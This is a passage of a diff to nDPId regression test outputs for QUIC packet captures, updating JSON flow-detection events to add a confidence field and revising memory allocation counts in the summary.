-00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":176,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621516418037,"flow_last_seen":1621516418037,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621516418037,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"7.71.118.27","src_port":57319,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00690{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":176,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621516418037,"flow_last_seen":1621516418037,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621516418037,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"7.71.118.27","src_port":57319,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00627{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":177,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621516418245,"flow_last_seen":1621516418245,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621516418245,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"53.101.228.200","src_port":60919,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02307{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":111,"flow_packet_id":1,"flow_last_seen":1621516418245,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621516418245,"pkt":"AAAAAAAAAAEAVM4PCABFAAViOjhAAH4Ruo+okEAFNWXkyO33AbsFTsjCy\/8AAB0ICh\/nnOWyISUAAEU0\/XSWRRoxvD58Z\/\/ltqn4D7VEFtfFH+jUGx0Einkv99\/DSfc2oPJY4DDN6JlHAc\/qXovlR01o81cgEAuTHi81V\/Ai4h2uKfJC8zpGb4iU8J9MQX3bFzSnnvrH0McYkR8dXhY+LkUeHEK56Er3NWFCyGj5bFUc6ULxpQIONyO3XCblXJAYYR1+HHMJV5rzq2a0tPhEQxMvfL9U2zDwAk9Znp3W+SBmkWdokjyAXwhbri5sLFI+o1IwVydXvtiLNEKZ6k23ZHvOevpJuly8FUhJlRZFzpQcsb8oqZg2pRE9C8POq2T6l9g2U9I6GvHiVjRZ98FT9qIvvDP6AD69Cajx3mGJWavv6aTsctL4VNEVQVix5W4yMVeC9v64prq2LuRUPHyNnEo9AoCfcOTMnnedkniclIIocpUSham+VwWsPb7ZVt6yBxcH8dnhbZwZX\/awC1yWaJ9PMxllHy6dWdwFXphZE0mlFrVD+Y2ViRFeWYhgXMd36a67EAh4KMOW1UUy9WRijdPxYzI\/3NPUKYw67EbvuD9TnJBZV9swUxHRb5oKjIJs\/zVJKEr4HgEriVT\/uHrCBUdG8YtziQ0VN1Hy\/c\/HszvPKD1I+6T3S74uGqEDJvz22fQycnxExC\/v2s2Io82JRN0DQ9+5+lgxD6yIJqUZ6xtHI\/7Qf+h1fMLSx4y8AKIJtJIOrgnAYrglEsKTnvJuZ\/7orf+yJX+h9BvEb+CqTGkkDjnK33BqpeiRlD+D5DuP3K4T+NB+diP9DR5dBkwLMLSdQF7qGWEWn7GBAMAcRho5edT66etmLlAdwVt2TRqnGXiBMNQSBXoW+toMKpTp1vnHlBgZmKFlg\/JJPZqOdbJdAyv3zJJRFPTBKEQoIS3zCUzYSTKEr7ud8E+tffKkIrAJ7EUAESGEhVWCM1DXL8i9M+Q9XJE3DJQpsWg6gUa9Fw98FeLlP+7TL0IhvOxx5LUeAalBQ0TKxj\/VCVN3UvSZDTeC9WpGfDhna9DGtD1xTnAi7jRi4CrseNR2IgaLm5JlbfkFLKccFrhInfwGJgkHj29LRsGRm1Es1jqRY3Ouk6bpGmMNWzcEEimo3csuOG58WiAdQz6WHsuiuYVG0DLgVi9H6doI1wsGghSdqDtHqoEwoIgb3tx5I7T\/h1Xq5LT9kt\/Uk5CeAEtSXIu4d9PJQM7OynI4I4wJApaL+JsbkbYJmUckRDj5+DcoOsYJRi+S3AzB\/jReXlCiXkDNx221LihD5QvdlILM9b41NYS1jREAGiqCaAAzmvoR5TwO\/4AEr0UdVZbLG6KYh5QUiJ4oy\/WVulKKHF6+TFf4tv4Um+NQ3oK95TXCRvmKZ3qS4aLtCdIbdrNCgVhBzlGHMjvmy6t7Qw421ogxqBJtm793TVCYZwBcnNLdGCCZCEtVQnfQzr8G1JOR1oO2iM8csHv28RhmsRXcaa4e0qdrR5f3akye3zgahdcjiXHhM7C+O7G\/1kLFug8TwlbhRgFQM9CkofyNV0s9NwP\/y3Hufd\/UIKneZE+EIy8AHj+5ijv0WoRhBnRJXYX5ycxl46tMEue8ARKo9MQUXx8V0we4qyXSx8gTP4pifQiQH82C4d\/Ia+gl\/7V0nVldVjo2XHTYnNKRl\/2r20w59XqRfVr2MyuvliKCJuXMORzGbGFmNF4tyPP98C4DrzmbvG593DjxQEJxLOd9WIDUQLYmSmdG68jG3Dj38xlZdbebj80NJ8y84A3+pm6EmRMXvK3LUyTKkRh1+p8LOow4Hx0dv+gfwFZd"}
-00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":177,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621516418245,"flow_last_seen":1621516418245,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621516418245,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"53.101.228.200","src_port":60919,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00693{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":177,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621516418245,"flow_last_seen":1621516418245,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621516418245,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"53.101.228.200","src_port":60919,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00625{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":178,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621516418037,"flow_last_seen":1621516418037,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621516733869,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"7.71.118.27","src_port":57319,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00625{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":178,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621516392616,"flow_last_seen":1621516392956,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621516733869,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"126.3.93.89","src_port":50224,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00627{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":178,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1621516401935,"flow_last_seen":1621516402235,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2700,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621516733869,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"31.219.210.96","src_port":62719,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -548,11 +548,11 @@
 00628{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":178,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621516418245,"flow_last_seen":1621516418245,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621516733869,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"53.101.228.200","src_port":60919,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00627{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":178,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621516733869,"flow_last_seen":1621516733869,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621516733869,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"144.237.113.58","src_port":50423,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02306{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":112,"flow_packet_id":1,"flow_last_seen":1621516733869,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621516733869,"pkt":"AAAAAAAAAAEAU0VlCABFAAViPaJAAH4RzyuokEAFkO1xOsT3AbsFTgHhyP8AAB0IbGyalH0+wYYANwDvfHyuzX0WyfJVw0PoKIyEKIwqfBNF14sFAvA9Fx6LB3xU9vL3ynu5LnbexvzNtyumb4fpTS5E\/XHfpwPYpXecyozflPK20TknHSDUVHAJTY9iUBdGsc+gRxEKw\/EnD4N0ApvBGoTWqmVkqyn2sk121zbYGDW6ErU1q+8hsbyKMoI4NfxjBnTspog\/m+eaL88Tqahvr6VuGmJOgsgyl\/gwce2fwd+d9PpunMJSkAS7yf2o1eZhJh9pY3klOtwZCFNQuDUJCJjazTJU7eVP\/0CtOYR0UdFKjm+WWzcoEB4VQS03kspRhaM2QP\/ptwjbxo6FO3oCmYBuOzT9NnCTurb66djTzhBQ7nPe1yBZiq6US4GpZG6aMK89NuAY5\/nz1pP2DYT5YcgrfYdhQ4YARsc04zYfLezdFb87pJyoch2m94u7HYMn24Xcbst7wof0dZvjDWkyw5cSFT4dsIwT2M8hyrtH3HjdLtgpphSCdYSyGuy9OvG7sn+MF0Jh5\/oJdnlWn\/USneemL\/aWfg+AXzhA\/IStwKORkQ6adbv0MxxQxhdhVlhABYhBf0naSCmQM2+cEelsB22JQdGyxVRZOb7H2e61nRmdya7eNqT+fobtyVJrZCrcoLN2LiU5dsnsqDNucCyYvDEkyd7kQp9qzPoYerFAw+PP\/vmmBvfd8Jm5zV8ExYYVZcEdRnY4EYoOzAPXdClrK9VuYF8c\/Y6ePAmXEmR1uClCx1ITHFshaCJhAhfyTByXjbfw\/nXGIZwveSnxeIYy1iabwqW2LFKaTx+JSk2nPQUZJdp\/gZHAXMi8UAeayRLCWh88FjEs+voztNRueCatb6uKPMygUEMEU+6M57k2I2+uTJVrFNtw0naiFrNM5aQWh\/8BtW73kEKOXlb2OOpWG33SsbDbt8f07KgzTSjaTcH+ym5fia5Rw7fV\/ORX4hRDVw6rpMBK8vHEzILGzqKPp\/Fzgy8Yu3yhNuwLA8BgUfSc1ByPGepdUQ33vZYRwkYXJIqjHVWQAfskEje0Wqn+YSnYlWZx7JpLG6MxX086GP6N+oCsmXNLxDtBJtSXiGmOVBp+cXeY5yNiplAtTeIdcdjOB66FqojPXZ4qFgzu67AqMMGZObJDMv\/Z4GW5X4Cgb4uXU+hjHX87oTa1YVxX0+H5LL9RQod7rJgo0j7m61cBp5xGUl\/xYmnsu3DdfPulCdT\/Xqvq9mDtvBpKPSZ89x120bFELyq+h\/m4PzITFcG5b0xOCTSTGB34QH9z4hfUNaP+WHZEXy5YNzh9YM1YXqvIrO+\/iwEMLfq33bR4jnXtPX1cFX+a4qrWOvuTa+bfX7Di\/IJNdHWVlIftUcO6+NFoLKQszqgdSRApeMWkwSgeT6R7yYowqnttX1EOkto0U21n9qsOOcZHS58\/p7UHB8lQVB8xDJnHjAwe2Yv8frMkPRsbdRaenhBn\/LLWS\/wyADvhqIIoQldbThikVaSXVwKU6ENOBP1gszcRFozOxr8R01PtBlDQ5QyH2EVc978OM4JjBCTbqtEjexBUwzGSaTGclsLHYMS3BuvKzOU5hVb9zTw+6jJKF0aIvgkbJVna7j07Xp335dcN+9bFri7aa2E4BpLCzZy+JNpokrgVDpYRk1pV3jGV9trdQsOs8CADI3foMn58d7Q949RGX2Zl7pv\/I5Gf1FwKxygyeU0D5cHoY5DXRYbGRoDOtCFxU18L0wLOrSKS8JC+eITcsIp6lD+\/42Vg3uHHr1yzTR3Tr7duzZ5RxafR49orBGtHZqde"}
-00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621516733869,"flow_last_seen":1621516733869,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621516733869,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"144.237.113.58","src_port":50423,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00693{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621516733869,"flow_last_seen":1621516733869,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621516733869,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"144.237.113.58","src_port":50423,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00628{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":179,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621516733869,"flow_last_seen":1621516733869,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621521142479,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"144.237.113.58","src_port":50423,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00626{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":179,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621521142479,"flow_last_seen":1621521142479,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621521142479,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"76.231.104.92","src_port":59206,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02301{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":113,"flow_packet_id":1,"flow_last_seen":1621521142479,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621521142479,"pkt":"AAAAAAAAAAEAS1QMCABFAAViSrhAAH4RDvqokEAFTOdoXOdGAbsFTt8wzP8AAB0IF8C5lRFZ4pEAAEU0ArfW5P1VplOmF6lJC6sD9FD5t7ksW3G6pIV+pxy8yJt6ChAKFxnQmbZIV9dRmn9\/GhICwwKjJ2FzV0KvCGLgZ6X+Mdfa6UbhiD5fnkjyzmiIAB9HARV9mwW0qWFR+1JZ0wBSXcVhsdD76Sf9pAJ1VTq0AAsSZXJGpY6+ga64ul50F4bjriucLzjYYNDw+HNSeQ06KntY3GZGimI9HLzbEr2ITrSYMZjOiiz48+8lDJD2UCwemzRbkRRjVcXHUb3Tc7AmoQBva7BoUSsAyx1+D5PZLPsFdXibn+bgqwT1LLMkHG9RRpo1Tt0gtl2pZ3bJxzRqJmP\/hGWMpoj6aUkAKucuXZomz1Q3f30mL0XyV\/0uY4\/XJg7V1OPue2C09RRuIDP1ooFtROu\/pDDI8HImrmKLKKL9dpKh9adfi5YYuPF4Is4HNqqqizalARCmdFSjpPpy98YfUSi2cVRDkchscThNdK38ko4V8Xy7wPkbIt0O9VavKfmHr39w5Ez1eaWFGZRrA0sn6GcPn8Dm2mBcIqBG5MQXN4W5fy1Y\/pT1svPFcC4q5\/EbD0QNn3Z9BNP8nBLiOsibf3MO3CFnOCJM1lkXUrVAGUZnjxGG+8QqLn4EDZelxu\/GTjx1L24MAsKjWwR\/o8CwEfewYTHjpSyuURWOKkKoimK1sbXS\/GUISZay6CW3ipWXDAWnzLjYcodUIMxsb6EXUcIWUdqRY3ypfHKYpkR2gJ8xECJ7AqLMiY6ZE2uxoDH2mplysDswerJmf0vlCYZjDi32D9NrSZoCZTUeWm4xfiTRs2WDrsd1DqSJwRmQac3\/k55LOe6c64B2i8EEyZy11iQXRTuxGAnfwPi7J2P7G5iOmklAoJzzL\/0e8gKlYQz1\/eyL8HHdtP9qbl5P1U5o8IfoTp\/dirgLtL\/sstyNOECz3S+ayZnviqEPhmw1cijJYWOrYO+8pc6zVY+d8ULBF\/1MP6ychzNJOS7uwIVz2UYuxjSek3ViUJolFI52vwDbTLtTK7tzBEeEdAEchicq0jw14m4HZ+e4tF+ukL7pInPzJ8wSVQteMvhcM05Lb5IMk0dp0n21Lhhxk4rfjW5o1Rx9yGagxsLW0M2mEMuP4yB02zIA7SbqYa7jGL8IZqDCmafSvYT3KeNsojBFm3l7E4ABP4OKSMnTDQnziym3spGoBu55cpHlCNnGIXsDXfxDbCuGO6UHeS1fMSqOZnhD\/oZDnP5dYfsIXucQnrcx7lxhddVt4WAUUkUstn0y6l\/ZI+n+V\/0pwNIHkKelqc8pvPNG+JI1PSwYT7AfrchIoFXExUQsiqKPMuonW36NpxM3LkCC\/aUwvKOHDe1CykT5CBTVTcvM6LiDoQeKOvHkAxU7lNkROINSK7LsZzcm53MqryrrO1UQHIMBmC2YTcM98zz7PGYSirT2iXt7W+8GhlTLOcB3tKQE+B8YL\/1\/AkWmWJZpkom5dDgbzqOZa+I8DdrHM7ji5OZONbEY9iRhxqtTq74iTkjQ5ERERvH0t6mntYj+OqsnNsbFzFwalVuNQrhXP+gbh5zien4KTygiyFYCjV+NChiZy8pxs1wT4ESZqkuqAehNcFqGsDoVgPoQOLhzIn\/DzItGeAiDrfHRixyOVU1EWsb7b30saK+ncY8sFqQNqA5lAl9gdLvQcfuDvdrDHmseBNqFM+55fa677QDOLLZ\/8MAydrSpxVKh5KZf++uVTUj630nVHiL+6S9majjl00xS38l2C9stuZ3K6Kgv+3rXBnYm4l74dpkK"}
-00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":179,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621521142479,"flow_last_seen":1621521142479,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621521142479,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"76.231.104.92","src_port":59206,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00692{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":179,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621521142479,"flow_last_seen":1621521142479,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621521142479,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"76.231.104.92","src_port":59206,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00627{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":179,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621521142479,"flow_last_seen":1621521142479,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621521142479,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"76.231.104.92","src_port":59206,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00201{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":179,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","total-events-serialized":557}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
@@ -563,9 +563,9 @@
 ~~ total active/idle flows...: 113/113
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 6260126 bytes
-~~ total memory freed........: 6260126 bytes
-~~ total allocations/frees...: 102134/102134
+~~ total memory allocated....: 6283479 bytes
+~~ total memory freed........: 6283479 bytes
+~~ total allocations/frees...: 103724/103724
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 206 chars
 ~~ json string max len.......: 2321 chars
diff --git a/test/results/quic_interop_V.pcapng.out b/test/results/quic_interop_V.pcapng.out
index 14bdb537e..9b37e029d 100644
--- a/test/results/quic_interop_V.pcapng.out
+++ b/test/results/quic_interop_V.pcapng.out
@@ -1,275 +1,275 @@
 00448{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"quic_interop_V.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00630{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434507,"flow_last_seen":1603816434507,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434507,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2400:8902::f03c:91ff:fe69:a454","src_port":38077,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02149{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1603816434507,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"ts_msec":1603816434507,"pkt":"pJGxgjQ5PKn0qB\/sht1gCq04BNgRQCABCwcKydWupNP+R2kegH0kAIkCAAAAAPA8kf\/+aaRUlL0BuwTYjlPGCgoKCgjBjvWe+MPFRAAARL4AnyCwAgoQjL1g+KDURvDYeEyLw\/xCRk6Dll3vQteHoVQFBQKAtW3\/PUJKxA75UMcNXhZUvkOXlYopsWey\/u66wX35Pj6pU3CXAqQ3fDp5zyCvr8Pm5AyoNAx0veCSUQeDBYfIgnerrrO2MEGoBqYPiiUt8xe5+r79P3P4ZzDRVupqGycbUWtQ6Wo6aZSD05slEqoyPBAaLp3YhydnPgb7vRWFjq0SdM0H\/zxBdY7aJ5VQRGeFUx984uZ\/K6yeMGPT3JYsoR6JIONmbNNldMQuEP+a7GBJ3iEWFJ1Nkel3g0iBwZRA7TTHinpesR5BAPJGKsJg\/VS2BeEVhnsQklM+ccg8cEJ\/WZ8KGZKu2b5eb3vaAvV55IOI0J2iO5UmLyQCl7SbwQC4xeRqoU1X\/r4ksMW+JxOVqFoTOp0p9K8G2C+kXU7PkGNUF6LWJgz0gBnPUfLEiLYep+IB3ydQMSXFv2q4ljMWpImZsfM1M1hyBHVdutiac3ctGpn70sK96\/GuFpnGs5SaPUZPVAd6cowQNyios9VD7LJHBycvPPV\/FVVqGKmtlmE1jhqYU8WM3TP2hIDFKj\/VkbTWINB6wKhdoTjaE++G5UWOW3DyJNvkrdNQDmb57TWpCvvDwZ0zyc9+kjM1P8gJU7fxklAOWt77tLOKjqKz2yyGTywbYI8fpyDxuwcOqHHM1p9Qo2bUMzUDDc5AgR5XXK8f98\/2k\/szEHoOj+xZ0LAk\/ktl3\/tNcCYf5NwDCkoJ2SA+A3liVp\/z86DQ\/o9ZPBbnT\/MRpriiusVj\/+7dyNzTUlosBxg\/ZTGIAFG9kkbqpmlXa9h8whQ+M5AjGTQXahgxhUg+T+XkcD3\/AwAskzg7QFF8QOQvTkgKR27pnPB9TcW0ov3zRKBSq2IRQasfzD4018QjLIoL6M1i7zKWOriPXhrbpQCBMed+qy0CCutCqcHfM5C6tdP5yjdd03xLltagPaoEJdMAzkTI4GTxawZxV\/nJEB2CpfHpXBAiLmSF3pSqQkOlK3gecF6Z5kJRZxdfHFiYQc+ZeBxM3ZsG9j3S6poeVhWhKtKijv579ezhO7g3QE97akiUNAtC\/9u96VNcgwwZo3pYzoh+bmR12ZZk\/flZDnZgzTtqeO5zikP6EaDg3xt4ZqzYpvmcwxx5bFkZ6tYCa\/WSn2OsS\/V89R9JkA+p04smS\/E7zSLxIHIjg7ziPRYLmF24dGHz34FZmheQHZ\/4gm1aFmIaG6\/7f5wmQDqHrB8QpqkJoLkDgUUHwTgyqeLrCOeAdu2eQCQJ4129kNDhXnJ7gWkCKO71EQxgH1wOzb5+V8dr\/jGNAAVFaptYOiLQes+Et0OXv\/4vGauirP+hYZEEAR3InBIIg\/L5KPxSdMCpSCm\/3UnE1zUNlTk7El74hPsNYUcmUS+usyw22jx+xLs4q3Kod9YDt4DrToci+qgaxSPs+xB3bX18DBMDyb8wNM5xFrlJXeWv7YCCDubwS+dnWseGEwnfJTp8dJgKhqy8jDuI7wNl1iTi5TWAuubz7G08V4L8udRmpqYJpILlauSw+hHEcI8MkM2s5oZz8Vly\/UrbvRIh+SQjHV9IgfXMkw